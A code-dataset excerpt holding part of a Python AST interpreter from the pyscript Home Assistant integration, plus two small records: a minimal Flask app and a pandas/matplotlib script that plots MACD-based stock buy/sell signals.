right=arg.value,\n )\n )\n var_name.setattr(val)\n else:\n val = await self.aeval(\n ast.BinOp(\n left=ast.Name(id=var_name, ctx=ast.Load()),\n op=arg.op,\n right=arg.value,\n )\n )\n if self.curr_func and var_name in self.curr_func.global_names:\n self.global_sym_table[var_name] = val\n elif self.curr_func and var_name in self.curr_func.nonlocal_names:\n for sym_table in reversed(self.sym_table_stack[1:]):\n if var_name in sym_table:\n sym_table[var_name] = val\n break\n else:\n raise TypeError(f\"can't find nonlocal '{var_name}' for assignment\")\n elif self.state.exist(var_name):\n self.state.set(var_name, val)\n else:\n self.sym_table[var_name] = val\n\n async def ast_delete(self, arg):\n \"\"\"Execute del statement.\"\"\"\n for arg1 in arg.targets:\n if isinstance(arg1, ast.Subscript):\n var = await self.aeval(arg1.value)\n if isinstance(arg1.slice, ast.Index):\n ind = await self.aeval(arg1.slice.value)\n for elt in ind if isinstance(ind, list) else [ind]:\n del var[elt]\n elif isinstance(arg1.slice, ast.Slice):\n lower, upper, step = None, None, None\n if arg1.slice.lower:\n lower = await self.aeval(arg1.slice.lower)\n if arg1.slice.upper:\n upper = await self.aeval(arg1.slice.upper)\n if arg1.slice.step:\n step = await self.aeval(arg1.slice.step)\n del var[slice(lower, upper, step)]\n else:\n raise NotImplementedError(\n f\"{self.name}: not implemented slice type {arg1.slice} in del\"\n )\n elif isinstance(arg1, ast.Name):\n if self.curr_func and arg1.id in self.curr_func.global_names:\n if arg1.id in self.global_sym_table:\n if isinstance(self.global_sym_table[arg1.id], EvalFunc):\n await self.global_ctx.stop(arg1.id)\n del self.global_sym_table[arg1.id]\n elif self.curr_func and arg1.id in self.curr_func.nonlocal_names:\n for sym_table in reversed(self.sym_table_stack[1:]):\n if arg1.id in sym_table:\n del sym_table[arg1.id]\n break\n elif arg1.id in self.sym_table:\n if isinstance(self.sym_table[arg1.id], EvalFunc):\n await self.global_ctx.stop(arg1.id)\n del self.sym_table[arg1.id]\n else:\n raise NameError(f\"name '{arg1.id}' is not defined in del\")\n else:\n raise NotImplementedError(f\"unknown target type {arg1} in del\")\n\n async def ast_attribute_collapse(self, arg): # pylint: disable=no-self-use\n \"\"\"Combine dotted attributes to allow variable names to have dots.\"\"\"\n # collapse dotted names, eg:\n # Attribute(value=Attribute(value=Name(id='i', ctx=Load()), attr='j', ctx=Load()), attr='k', ctx=Store())\n name = arg.attr\n val = arg.value\n while isinstance(val, ast.Attribute):\n name = val.attr + \".\" + name\n val = val.value\n if isinstance(val, ast.Name):\n name = val.id + \".\" + name\n # ensure the first portion of name is undefined\n val = await self.ast_name(ast.Name(id=val.id, ctx=ast.Load()))\n if not isinstance(val, EvalName):\n return None\n return name\n return None\n\n async def ast_attribute(self, arg):\n \"\"\"Apply attributes.\"\"\"\n full_name = await self.ast_attribute_collapse(arg)\n if full_name is not None:\n if isinstance(arg.ctx, ast.Store):\n return full_name\n val = await self.ast_name(ast.Name(id=full_name, ctx=arg.ctx))\n if not isinstance(val, EvalName):\n return val\n val = await self.aeval(arg.value)\n if isinstance(arg.ctx, ast.Store):\n return EvalAttrSet(val, arg.attr)\n return getattr(val, arg.attr)\n\n async def ast_name(self, arg):\n \"\"\"Look up value of identifier on load, or returns name on set.\"\"\"\n if isinstance(arg.ctx, ast.Load):\n #\n # check other scopes if required by global or nonlocal declarations\n #\n if self.curr_func and arg.id in self.curr_func.global_names:\n if arg.id in self.global_sym_table:\n return self.global_sym_table[arg.id]\n raise NameError(f\"global name '{arg.id}' is not defined\")\n if self.curr_func and arg.id in self.curr_func.nonlocal_names:\n for sym_table in reversed(self.sym_table_stack[1:]):\n if arg.id in sym_table:\n return sym_table[arg.id]\n raise NameError(f\"nonlocal name '{arg.id}' is not defined\")\n #\n # now check in our current symbol table, and then some other places\n #\n if arg.id in self.sym_table:\n return self.sym_table[arg.id]\n if arg.id in self.local_sym_table:\n return self.local_sym_table[arg.id]\n if arg.id in self.global_sym_table:\n return self.global_sym_table[arg.id]\n if arg.id in BUILTIN_AST_FUNCS_FACTORY:\n return BUILTIN_AST_FUNCS_FACTORY[arg.id](self)\n if (\n hasattr(builtins, arg.id)\n and arg.id not in BUILTIN_EXCLUDE\n and arg.id[0] != \"_\"\n ):\n return getattr(builtins, arg.id)\n if self.handler.get(arg.id):\n return self.handler.get(arg.id)\n num_dots = arg.id.count(\".\")\n #\n # any single-dot name could be a state variable\n # a two-dot name for state.attr needs to exist\n #\n if num_dots == 2:\n _LOGGER.debug(\n \"ast_name: arg = {arg.id}, exist = {self.state.exist(arg.id)}\"\n )\n if num_dots == 1 or (num_dots == 2 and self.state.exist(arg.id)):\n return self.state.get(arg.id)\n #\n # Couldn't find it, so return just the name wrapped in EvalName to\n # distinguish from a string variable value. This is to support\n # names with \".\", which are joined by ast_attribute\n #\n return EvalName(arg.id)\n return arg.id\n\n async def ast_binop(self, arg):\n \"\"\"Evaluate binary operators by calling function based on class.\"\"\"\n name = \"ast_binop_\" + arg.op.__class__.__name__.lower()\n return await getattr(self, name, self.ast_not_implemented)(arg.left, arg.right)\n\n async def ast_binop_add(self, arg0, arg1):\n \"\"\"Evaluate binary operator: +.\"\"\"\n return (await self.aeval(arg0)) + (await self.aeval(arg1))\n\n async def ast_binop_sub(self, arg0, arg1):\n \"\"\"Evaluate binary operator: -.\"\"\"\n return (await self.aeval(arg0)) - (await self.aeval(arg1))\n\n async def ast_binop_mult(self, arg0, arg1):\n \"\"\"Evaluate binary operator: *.\"\"\"\n return (await self.aeval(arg0)) * (await self.aeval(arg1))\n\n async def ast_binop_div(self, arg0, arg1):\n \"\"\"Evaluate binary operator: /.\"\"\"\n return (await self.aeval(arg0)) / (await self.aeval(arg1))\n\n async def ast_binop_mod(self, arg0, arg1):\n \"\"\"Evaluate binary operator: %.\"\"\"\n return (await self.aeval(arg0)) % (await self.aeval(arg1))\n\n async def ast_binop_pow(self, arg0, arg1):\n \"\"\"Evaluate binary operator: **.\"\"\"\n return (await self.aeval(arg0)) ** (await self.aeval(arg1))\n\n async def ast_binop_lshift(self, arg0, arg1):\n \"\"\"Evaluate binary operator: <<.\"\"\"\n return (await self.aeval(arg0)) << (await self.aeval(arg1))\n\n async def ast_binop_rshift(self, arg0, arg1):\n \"\"\"Evaluate binary operator: >>.\"\"\"\n return (await self.aeval(arg0)) >> (await self.aeval(arg1))\n\n async def ast_binop_bitor(self, arg0, arg1):\n \"\"\"Evaluate binary operator: |.\"\"\"\n return (await self.aeval(arg0)) | (await self.aeval(arg1))\n\n async def ast_binop_bitxor(self, arg0, arg1):\n \"\"\"Evaluate binary operator: ^.\"\"\"\n return (await self.aeval(arg0)) ^ (await self.aeval(arg1))\n\n async def ast_binop_bitand(self, arg0, arg1):\n \"\"\"Evaluate binary operator: &.\"\"\"\n return (await self.aeval(arg0)) & (await self.aeval(arg1))\n\n async def ast_binop_floordiv(self, arg0, arg1):\n \"\"\"Evaluate binary operator: //.\"\"\"\n return (await self.aeval(arg0)) // (await self.aeval(arg1))\n\n async def ast_unaryop(self, arg):\n \"\"\"Evaluate unary operators by calling function based on class.\"\"\"\n name = \"ast_unaryop_\" + arg.op.__class__.__name__.lower()\n return await getattr(self, name, self.ast_not_implemented)(arg.operand)\n\n async def ast_unaryop_not(self, arg0):\n \"\"\"Evaluate unary operator: not.\"\"\"\n return not (await self.aeval(arg0))\n\n async def ast_unaryop_invert(self, arg0):\n \"\"\"Evaluate unary operator: ~.\"\"\"\n return ~(await self.aeval(arg0))\n\n async def ast_unaryop_uadd(self, arg0):\n \"\"\"Evaluate unary operator: +.\"\"\"\n return await self.aeval(arg0)\n\n async def ast_unaryop_usub(self, arg0):\n \"\"\"Evaluate unary operator: -.\"\"\"\n return -(await self.aeval(arg0))\n\n async def ast_compare(self, arg):\n \"\"\"Evaluate comparison operators by calling function based on class.\"\"\"\n left = arg.left\n for cmp_op, right in zip(arg.ops, arg.comparators):\n name = \"ast_cmpop_\" + cmp_op.__class__.__name__.lower()\n val = await getattr(self, name, self.ast_not_implemented)(left, right)\n if not val:\n return False\n left = right\n return True\n\n async def ast_cmpop_eq(self, arg0, arg1):\n \"\"\"Evaluate comparison operator: ==.\"\"\"\n return (await self.aeval(arg0)) == (await self.aeval(arg1))\n\n async def ast_cmpop_noteq(self, arg0, arg1):\n \"\"\"Evaluate comparison operator: !=.\"\"\"\n return (await self.aeval(arg0)) != (await self.aeval(arg1))\n\n async def ast_cmpop_lt(self, arg0, arg1):\n \"\"\"Evaluate comparison operator: <.\"\"\"\n return (await self.aeval(arg0)) < (await self.aeval(arg1))\n\n async def ast_cmpop_lte(self, arg0, arg1):\n \"\"\"Evaluate comparison operator: <=.\"\"\"\n return (await self.aeval(arg0)) <= (await self.aeval(arg1))\n\n async def ast_cmpop_gt(self, arg0, arg1):\n \"\"\"Evaluate comparison operator: >.\"\"\"\n return (await self.aeval(arg0)) > (await self.aeval(arg1))\n\n async def ast_cmpop_gte(self, arg0, arg1):\n \"\"\"Evaluate comparison operator: >=.\"\"\"\n return (await self.aeval(arg0)) >= (await self.aeval(arg1))\n\n async def ast_cmpop_is(self, arg0, arg1):\n \"\"\"Evaluate comparison operator: is.\"\"\"\n return (await self.aeval(arg0)) is (await self.aeval(arg1))\n\n async def ast_cmpop_isnot(self, arg0, arg1):\n \"\"\"Evaluate comparison operator: is not.\"\"\"\n return (await self.aeval(arg0)) is not (await self.aeval(arg1))\n\n async def ast_cmpop_in(self, arg0, arg1):\n \"\"\"Evaluate comparison operator: in.\"\"\"\n return (await self.aeval(arg0)) in (await self.aeval(arg1))\n\n async def ast_cmpop_notin(self, arg0, arg1):\n \"\"\"Evaluate comparison operator: not in.\"\"\"\n return (await self.aeval(arg0)) not in (await self.aeval(arg1))\n\n async def ast_boolop(self, arg):\n \"\"\"Evaluate boolean operators and and or.\"\"\"\n if isinstance(arg.op, ast.And):\n val = 1\n for arg1 in arg.values:\n this_val = await self.aeval(arg1)\n if this_val == 0:\n return 0\n val = this_val\n return val\n for arg1 in arg.values:\n val = await self.aeval(arg1)\n if val != 0:\n return val\n return 0\n\n async def eval_elt_list(self, elts):\n \"\"\"Evaluate and star list elements.\"\"\"\n val = []\n for arg in elts:\n if isinstance(arg, ast.Starred):\n for this_val in await self.aeval(arg.value):\n val.append(this_val)\n else:\n this_val = await self.aeval(arg)\n val.append(this_val)\n return val\n\n async def ast_list(self, arg):\n \"\"\"Evaluate list.\"\"\"\n if isinstance(arg.ctx, ast.Load):\n return await self.eval_elt_list(arg.elts)\n\n async def ast_tuple(self, arg):\n \"\"\"Evaluate Tuple.\"\"\"\n return tuple(await self.eval_elt_list(arg.elts))\n\n async def ast_dict(self, arg):\n \"\"\"Evaluate dict.\"\"\"\n val = {}\n for key_ast, val_ast in zip(arg.keys, arg.values):\n this_val = await self.aeval(val_ast)\n if key_ast is None:\n val.update(this_val)\n else:\n val[await self.aeval(key_ast)] = this_val\n return val\n\n async def ast_set(self, arg):\n \"\"\"Evaluate set.\"\"\"\n val = set()\n for elt in await self.eval_elt_list(arg.elts):\n val.add(elt)\n return val\n\n async def ast_subscript(self, arg):\n \"\"\"Evaluate subscript.\"\"\"\n var = await self.aeval(arg.value)\n if isinstance(arg.ctx, ast.Load):\n if isinstance(arg.slice, ast.Index):\n return var[await self.aeval(arg.slice)]\n if isinstance(arg.slice, ast.Slice):\n lower = (await self.aeval(arg.slice.lower)) if arg.slice.lower else None\n upper = (await self.aeval(arg.slice.upper)) if arg.slice.upper else None\n step = (await self.aeval(arg.slice.step)) if arg.slice.step else None\n return var[slice(lower, upper, step)]\n else:\n return None\n\n async def ast_index(self, arg):\n \"\"\"Evaluate index.\"\"\"\n return await self.aeval(arg.value)\n\n async def ast_slice(self, arg):\n \"\"\"Evaluate slice.\"\"\"\n return await self.aeval(arg.value)\n\n async def ast_call(self, arg):\n \"\"\"Evaluate function call.\"\"\"\n func = await self.aeval(arg.func)\n kwargs = {}\n for kw_arg in arg.keywords:\n if kw_arg.arg is None:\n kwargs.update(await self.aeval(kw_arg.value))\n else:\n kwargs[kw_arg.arg] = await self.aeval(kw_arg.value)\n args = await self.eval_elt_list(arg.args)\n arg_str = \", \".join(\n ['\"' + elt + '\"' if isinstance(elt, str) else str(elt) for elt in args]\n )\n\n if isinstance(func, EvalFunc):\n return await func.call(self, args, kwargs)\n #\n # try to deduce function name, although this only works in simple cases\n #\n if isinstance(arg.func, ast.Name):\n func_name = arg.func.id\n elif isinstance(arg.func, ast.Attribute):\n func_name = arg.func.attr\n else:\n func_name = \"\"\n if callable(func):\n _LOGGER.debug(\n \"%s: calling %s(%s, %s)\", self.name, func_name, arg_str, kwargs\n )\n if asyncio.iscoroutinefunction(func):\n return await func(*args, **kwargs)\n return func(*args, **kwargs)\n raise NameError(f\"function '{func_name}' is not callable (got {func})\")\n\n async def ast_functiondef(self, arg):\n \"\"\"Evaluate function definition.\"\"\"\n func = EvalFunc(arg, self.code_list, self.code_str)\n await func.eval_defaults(self)\n await func.eval_decorators(self)\n self.sym_table[func.get_name()] = func\n if self.sym_table == self.global_sym_table:\n # set up any triggers if this function is in the global context\n await self.global_ctx.trigger_init(func)\n return None\n\n async def ast_ifexp(self, arg):\n \"\"\"Evaluate if expression.\"\"\"\n return (\n await self.aeval(arg.body)\n if (await self.aeval(arg.test))\n else await self.aeval(arg.orelse)\n )\n\n async def ast_num(self, arg):\n \"\"\"Evaluate number.\"\"\"\n return arg.n\n\n async def ast_str(self, arg):\n \"\"\"Evaluate string.\"\"\"\n return arg.s\n\n async def ast_nameconstant(self, arg):\n \"\"\"Evaluate name constant.\"\"\"\n return arg.value\n\n async def ast_constant(self, arg):\n \"\"\"Evaluate constant.\"\"\"\n return arg.value\n\n async def ast_joinedstr(self, arg):\n \"\"\"Evaluate joined string.\"\"\"\n val = \"\"\n for arg1 in arg.values:\n this_val = await self.aeval(arg1)\n val = val + str(this_val)\n return val\n\n async def ast_formattedvalue(self, arg):\n \"\"\"Evaluate formatted value.\"\"\"\n val = await self.aeval(arg.value)\n if arg.format_spec is not None:\n fmt = await self.aeval(arg.format_spec)\n return f\"{val:{fmt}}\"\n return f\"{val}\"\n\n async def ast_get_names2_dict(self, arg, names):\n \"\"\"Recursively find all the names mentioned in the AST tree.\"\"\"\n if isinstance(arg, ast.Attribute):\n full_name = await self.ast_attribute_collapse(arg)\n if full_name is not None:\n names[full_name] = 1\n elif isinstance(arg, ast.Name):\n names[arg.id] = 1\n else:\n for child in ast.iter_child_nodes(arg):\n await self.ast_get_names2_dict(child, names)\n\n async def ast_get_names(self):\n \"\"\"Return list of all the names mentioned in our AST tree.\"\"\"\n names = {}\n if self.ast:\n await self.ast_get_names2_dict(self.ast, names)\n return [*names]\n\n def parse(self, code_str, filename=None):\n \"\"\"Parse the code_str source code into an AST tree.\"\"\"\n self.exception = None\n self.exception_obj = None\n self.exception_long = None\n self.ast = None\n if filename is not None:\n self.filename = filename\n try:\n if isinstance(code_str, list):\n self.code_list = code_str\n self.code_str = \"\\n\".join(code_str)\n elif isinstance(code_str, str):\n self.code_str = code_str\n self.code_list = code_str.split(\"\\n\")\n else:\n self.code_str = code_str\n self.code_list = []\n self.ast = ast.parse(self.code_str, filename=self.filename)\n return True\n except SyntaxError as err:\n self.exception_obj = err\n self.lineno = err.lineno\n self.col_offset = err.offset - 1\n self.exception = f\"syntax error {err}\"\n self.exception_long = self.format_exc(err, self.lineno, self.col_offset)\n return False\n except asyncio.CancelledError: # pylint: disable=try-except-raise\n raise\n except Exception as err: # pylint: disable=broad-except\n self.exception_obj = err\n self.lineno = 1\n self.col_offset = 0\n self.exception = f\"parsing error {err}\"\n self.exception_long = self.format_exc(err)\n return False\n\n def format_exc(self, exc, lineno=None, col_offset=None, short=False):\n \"\"\"Format an multi-line exception message using lineno if available.\"\"\"\n if lineno is not None:\n if short:\n mesg = f\"In <{self.filename}> line {lineno}:\\n\"\n mesg += \" \" + self.code_list[lineno - 1]\n else:\n mesg = f\"Exception in <{self.filename}> line {lineno}:\\n\"\n mesg += \" \" + self.code_list[lineno - 1] + \"\\n\"\n if col_offset is not None:\n mesg += \" \" + \" \" * col_offset + \"^\\n\"\n mesg += f\"{type(exc).__name__}: {exc}\"\n else:\n mesg = f\"Exception in <{self.filename}>:\\n\"\n mesg += f\"{type(exc).__name__}: {exc}\"\n return mesg\n\n def get_exception(self):\n \"\"\"Return the last exception str.\"\"\"\n return self.exception\n\n def get_exception_obj(self):\n \"\"\"Return the last exception object.\"\"\"\n return self.exception_obj\n\n def get_exception_long(self):\n \"\"\"Return the last exception in a longer str form.\"\"\"\n return self.exception_long\n\n def set_local_sym_table(self, sym_table):\n \"\"\"Set the local symbol table.\"\"\"\n self.local_sym_table = sym_table\n\n def set_global_ctx(self, global_ctx):\n \"\"\"Set the global context.\"\"\"\n self.global_ctx = global_ctx\n if self.sym_table == self.global_sym_table:\n self.global_sym_table = global_ctx.get_global_sym_table()\n self.sym_table = self.global_sym_table\n else:\n self.global_sym_table = global_ctx.get_global_sym_table()\n if len(self.sym_table_stack) > 0:\n self.sym_table_stack[0] = self.global_sym_table\n\n def get_global_ctx(self):\n \"\"\"Return the global context.\"\"\"\n return self.global_ctx\n\n def get_global_ctx_name(self):\n \"\"\"Return the global context name.\"\"\"\n return self.global_ctx.get_name()\n\n def set_logger_name(self, name):\n \"\"\"Set the context's logger name.\"\"\"\n if self.logger:\n for handler in self.logger_handlers:\n self.logger.removeHandler(handler)\n self.logger_name = name\n self.logger = logging.getLogger(LOGGER_PATH + \".\" + name)\n for handler in self.logger_handlers:\n self.logger.addHandler(handler)\n\n def get_logger_name(self):\n \"\"\"Get the context's logger name.\"\"\"\n return self.logger_name\n\n def get_logger(self):\n \"\"\"Get the context's logger.\"\"\"\n return self.logger\n\n def add_logger_handler(self, handler):\n \"\"\"Add logger handler to this context.\"\"\"\n self.logger.addHandler(handler)\n self.logger_handlers.add(handler)\n\n def remove_logger_handler(self, handler):\n \"\"\"Remove logger handler to this context.\"\"\"\n self.logger.removeHandler(handler)\n self.logger_handlers.discard(handler)\n\n def completions(self, root):\n \"\"\"Return potential variable, function or attribute matches.\"\"\"\n words = set()\n num_period = root.count(\".\")\n if num_period >= 1: # pylint: disable=too-many-nested-blocks\n last_period = root.rfind(\".\")\n name = root[0:last_period]\n attr_root = root[last_period + 1 :]\n if name in self.global_sym_table:\n var = self.global_sym_table[name]\n try:\n for attr in var.__dir__():\n if attr.lower().startswith(attr_root) and (\n attr_root != \"\" or attr[0:1] != \"_\"\n ):\n value = getattr(var, attr, None)\n if callable(value) or isinstance(value, EvalFunc):\n words.add(f\"{name}.{attr}\")\n else:\n words.add(f\"{name}.{attr}\")\n except Exception: # pylint: disable=broad-except\n pass\n sym_table = BUILTIN_AST_FUNCS_FACTORY.copy()\n for name, value in builtins.__dict__.items():\n if name[0] != \"_\" and name not in BUILTIN_EXCLUDE:\n sym_table[name] = value\n sym_table.update(self.global_sym_table.items())\n for name, value in sym_table.items():\n if name.lower().startswith(root):\n if callable(value) or isinstance(value, EvalFunc):\n # used to be f\"{name}(\", but Jupyter doesn't always do the right thing with that\n words.add(name)\n else:\n words.add(name)\n return words\n\n async def eval(self, new_state_vars=None):\n \"\"\"Execute parsed code, with the optional state variables added to the scope.\"\"\"\n self.exception = None\n self.exception_obj = None\n self.exception_long = None\n if new_state_vars:\n self.local_sym_table.update(new_state_vars)\n if self.ast:\n try:\n val = await self.aeval(self.ast)\n if isinstance(val, EvalStopFlow):\n return None\n return val\n except asyncio.CancelledError: # pylint: disable=try-except-raise\n raise\n except Exception as err: # pylint: disable=broad-except\n if self.exception_long is None:\n self.exception_long = self.format_exc(\n err, self.lineno, self.col_offset\n )\n return None\n\n def dump(self):\n \"\"\"Dump the AST tree for debugging.\"\"\"\n return ast.dump(self.ast)\n", "sub_path": "custom_components/pyscript/eval.py", "file_name": "eval.py", "file_ext": "py", "file_size_in_byte": 47422, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "logging.getLogger", "line_number": 12, "usage_type": "call"}, {"api_name": "const.LOGGER_PATH", "line_number": 12, "usage_type": "name"}, {"api_name": "ast.get_docstring", "line_number": 175, "usage_type": "call"}, {"api_name": "ast.Call", "line_number": 205, "usage_type": "attribute"}, {"api_name": "ast.Name", "line_number": 205, "usage_type": "attribute"}, {"api_name": "ast.Name", "line_number": 210, "usage_type": "attribute"}, {"api_name": "asyncio.CancelledError", "line_number": 236, "usage_type": "attribute"}, {"api_name": "const.ALLOWED_IMPORTS", "line_number": 389, "usage_type": "name"}, {"api_name": "sys.modules", "line_number": 391, "usage_type": "attribute"}, {"api_name": "importlib.import_module", "line_number": 392, "usage_type": "call"}, {"api_name": "sys.modules", "line_number": 394, "usage_type": "attribute"}, {"api_name": "const.ALLOWED_IMPORTS", "line_number": 399, "usage_type": "name"}, {"api_name": "sys.modules", "line_number": 401, "usage_type": "attribute"}, {"api_name": "importlib.import_module", "line_number": 402, "usage_type": "call"}, {"api_name": "sys.modules", "line_number": 404, "usage_type": "attribute"}, {"api_name": "ast.Tuple", "line_number": 554, "usage_type": "attribute"}, {"api_name": "ast.Subscript", "line_number": 567, "usage_type": "attribute"}, {"api_name": "ast.Index", "line_number": 569, "usage_type": "attribute"}, {"api_name": "ast.BinOp", "line_number": 606, "usage_type": "call"}, {"api_name": "ast.Constant", "line_number": 607, "usage_type": "call"}, {"api_name": "ast.BinOp", "line_number": 615, "usage_type": "call"}, {"api_name": "ast.Name", "line_number": 616, "usage_type": "call"}, {"api_name": "ast.Load", "line_number": 616, "usage_type": "call"}, {"api_name": "ast.Subscript", "line_number": 638, "usage_type": "attribute"}, {"api_name": "ast.Index", "line_number": 640, "usage_type": "attribute"}, {"api_name": "ast.Slice", "line_number": 644, "usage_type": "attribute"}, {"api_name": "ast.Name", "line_number": 657, "usage_type": "attribute"}, {"api_name": "ast.Attribute", "line_number": 683, "usage_type": "attribute"}, {"api_name": "ast.Name", "line_number": 686, "usage_type": "attribute"}, {"api_name": "ast.Name", "line_number": 689, "usage_type": "call"}, {"api_name": "ast.Load", "line_number": 689, "usage_type": "call"}, {"api_name": "ast.Store", "line_number": 699, "usage_type": "attribute"}, {"api_name": "ast.Name", "line_number": 701, "usage_type": "call"}, {"api_name": "ast.Store", "line_number": 705, "usage_type": "attribute"}, {"api_name": "ast.Load", "line_number": 711, "usage_type": "attribute"}, {"api_name": "ast.And", "line_number": 889, "usage_type": "attribute"}, {"api_name": "ast.Starred", "line_number": 907, "usage_type": "attribute"}, {"api_name": "ast.Load", "line_number": 917, "usage_type": "attribute"}, {"api_name": "ast.Load", "line_number": 945, "usage_type": "attribute"}, {"api_name": "ast.Index", "line_number": 946, "usage_type": "attribute"}, {"api_name": "ast.Slice", "line_number": 948, "usage_type": "attribute"}, {"api_name": "ast.Name", "line_number": 983, "usage_type": "attribute"}, {"api_name": "ast.Attribute", "line_number": 985, "usage_type": "attribute"}, {"api_name": "asyncio.iscoroutinefunction", "line_number": 993, "usage_type": "call"}, {"api_name": "ast.Attribute", "line_number": 1051, "usage_type": "attribute"}, {"api_name": "ast.Name", "line_number": 1055, "usage_type": "attribute"}, {"api_name": "ast.iter_child_nodes", "line_number": 1058, "usage_type": "call"}, {"api_name": "ast.parse", "line_number": 1086, "usage_type": "call"}, {"api_name": "asyncio.CancelledError", "line_number": 1095, "usage_type": "attribute"}, {"api_name": "logging.getLogger", "line_number": 1163, "usage_type": "call"}, {"api_name": "const.LOGGER_PATH", "line_number": 1163, "usage_type": "name"}, {"api_name": "builtins.__dict__.items", "line_number": 1208, "usage_type": "call"}, {"api_name": "builtins.__dict__", "line_number": 1208, "usage_type": "attribute"}, {"api_name": "asyncio.CancelledError", "line_number": 1234, "usage_type": "attribute"}, {"api_name": "ast.dump", "line_number": 1245, "usage_type": "call"}]}
+{"seq_id": "306120744", "text": "from flask import Flask\n\n\n\n\n\n\napp = Flask(__name__)\n\n\n\n\n@app.route('/')\ndef idx():\n\tt = open('./index.html','r')\n\tr = t.read()\n\tt.close()\n\treturn r\n\n\n\n@app.route('/get/')\ndef dataset(num_rows):\n\td = create_data(int(num_rows))\n\treturn d\n\n\n\n\nif __name__=='__main__':\n\tapp.run(debug=False, host='localhost',port=1000)\n\n\n", "sub_path": "http.py", "file_name": "http.py", "file_ext": "py", "file_size_in_byte": 327, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "flask.Flask", "line_number": 8, "usage_type": "call"}]}
+{"seq_id": "33435948", "text": "from data import data\r\nfrom pandas import pandas as pd\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\nplt.style.use('fivethirtyeight')\r\n\r\n#This is a program used to query incoming stock data. \r\n\r\n# get the data from the excel file\r\ndf = pd.read_excel('companyData.xlsx')\r\n# Change the data frame to be indexed by date\r\ndf = df.set_index(pd.DatetimeIndex(df['date'].values))\r\n# make a graph\r\nplt.figure(figsize=(14.0,8.0))\r\nplt.plot(df['4. close'], label='close')\r\nplt.title('Daily close price')\r\nplt.xticks(rotation = 45)\r\nplt.xlabel('Date')\r\nplt.ylabel('Price $')\r\n# plt.show()\r\n\r\n# Calculate MACD and signal line indicators\r\n# Calculate the short term exponential moving average (EMA)\r\nshort_EMA = df['4. close'].ewm(span=12, adjust = False).mean()\r\n# Calculate long term exponential moving average\r\nlong_EMA = df['4. close'].ewm(span=26, adjust = False).mean()\r\n# calculate MACD line\r\nMACD = short_EMA - long_EMA\r\n# create signal line\r\nsignal = MACD.ewm(span=9, adjust= False).mean()\r\nplt.figure(figsize=(12.5, 5.0))\r\nplt.plot(df.index, MACD, label = 'DAL MACD', color='red')\r\nplt.plot(df.index, signal, label = 'Signal line', color='blue')\r\nplt.legend(loc='upper left')\r\nplt.show()\r\n\r\n# create new columns for data\r\ndf['MACD'] = MACD\r\ndf['Signal'] = signal\r\n\r\n# create function to buy or sell\r\ndef buy_sell(signal):\r\n buy = []\r\n sell = []\r\n flag = -1\r\n for i in range(0, len(signal)):\r\n if signal['MACD'][i] > signal['Signal'][i]:\r\n sell.append(np.nan)\r\n if flag != 1:\r\n buy.append((signal['4. close'][i]))\r\n flag = 1\r\n else:\r\n buy.append(np.nan)\r\n elif signal['MACD'][i] < signal['Signal'][i]:\r\n buy.append(np.nan)\r\n if flag != 0:\r\n sell.append((signal['4. close'][i]))\r\n flag = 0\r\n else:\r\n sell.append(np.nan)\r\n else:\r\n sell.append(np.nan)\r\n buy.append(np.nan)\r\n return (buy, sell)\r\n# print(short_EMA)\r\n# print(df)\r\na = buy_sell(df)\r\ndf['Buy_Signal_Price'] = a[0]\r\ndf['Sell_Signal_Price'] = a[1]\r\n#show the data\r\nplt.figure(figsize=(12.5, 4.5))\r\nplt.scatter(df.index, df['Buy_Signal_Price'], color='green', label='Buy', marker='^', alpha=1)\r\nplt.scatter(df.index, df['Sell_Signal_Price'], color='red', label='Sell', marker='v', alpha=1)\r\nplt.plot(df.index, df['4. close'], label='Close Price', alpha = 0.35)\r\nplt.title('Close price buy/sell signals')\r\nplt.xlabel('Date')\r\nplt.ylabel('Close price $')\r\nplt.legend(loc = 'upper left')\r\nplt.show()", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 2570, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "73", "api": [{"api_name": "matplotlib.pyplot.style.use", "line_number": 5, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.style", "line_number": 5, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot", "line_number": 5, "usage_type": "name"}, {"api_name": "pandas.pandas.read_excel", "line_number": 10, "usage_type": "call"}, {"api_name": "pandas.pandas", "line_number": 10, "usage_type": "name"}, {"api_name": "pandas.pandas.DatetimeIndex", "line_number": 12, "usage_type": "call"}, {"api_name": "pandas.pandas", "line_number": 12, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 14, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 14, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 15, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 15, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 16, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 16, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 17, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 17, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 18, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 18, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 19, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 19, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 31, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 31, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 32, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 33, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 33, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 34, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 35, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 35, "usage_type": "name"}, {"api_name": "numpy.nan", "line_number": 48, "usage_type": "attribute"}, {"api_name": "numpy.nan", "line_number": 53, "usage_type": "attribute"}, 